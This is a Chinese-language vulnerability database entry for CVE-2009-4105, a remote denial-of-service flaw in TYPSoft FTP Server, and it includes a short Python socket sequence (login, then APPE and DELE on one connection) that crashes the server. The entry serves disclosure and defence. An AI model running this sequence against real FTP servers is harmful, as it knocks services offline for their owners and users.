TYPSoft FTP Server APPE和DELE命令远程拒绝服务漏洞 CVE-2009-4105 CNNVD-200911-305

3.5 AV AC AU C I A
发布: 2009-11-29
修订: 2018-10-10

TYPSoft FTP Server是一款简单易用的FTP服务程序。 TYPSoft FTP Server中存在拒绝服务漏洞,用户登录到服务器后对同一个套接字连接同时使用APPE和DELE命令就会导致服务器崩溃: 1.sock.connect((hostname, 21)) 2.sock.send(\"user \\%s\r\n\" \\%username) 3.sock.send(\"pass \\%s\r\n\" \\%passwd) 4.sock.send(\"PORT 127,0,0,1,122,107\r\n\") 5.sock.send(\"APPE \"+ test_string +\"\r\n\") 6.sock.send(\"DELE \"+ test_string +\"\r\n\") 7.sock.close()

0%
当前有1条漏洞利用/PoC
当前有1条受影响产品信息